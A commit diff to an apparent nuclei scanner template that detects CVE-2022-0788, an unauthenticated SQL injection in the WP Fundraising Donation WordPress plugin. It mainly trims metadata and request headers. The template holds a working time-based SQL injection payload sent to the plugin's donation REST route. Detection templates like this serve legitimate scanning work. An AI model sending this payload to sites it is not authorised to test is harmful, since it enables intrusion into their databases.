Update CVE-2022-0788.yaml

2022-11-09 09:20:26 +05:30 · 2022-11-09 09:20:26 +05:30 · 8a1878fa77
parent 249de89c55
commit 8a1878fa77
1 changed files with 4 additions and 11 deletions
--- a/cves/2022/CVE-2022-0788.yaml
+++ b/cves/2022/CVE-2022-0788.yaml
@ -11,25 +11,18 @@ info:
    - https://wordpress.org/plugins/wp-fundraising-donation/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0788
  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
    cve-id: CVE-2022-0788
-    cwe-id: CWE-89
  metadata:
-    verified: "true"
-  tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth
+    verified: true
+  tags: cve,cve2022,sqli,wordpress,wp-plugin,wp,wp-fundraising-donation,unauth

 requests:
  - raw:
      - |
-        @timeout: 15s
+        @timeout: 10s
        GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
        Host: {{Hostname}}
-        User-Agent: curl/7.79.1
-        Accept: */*
        Content-Type: application/json
-        Content-Length: 87
-        Connection: close

        {"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}

@ -40,4 +33,4 @@ requests:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "Invalid payment.")'
-        condition: and
+        condition: and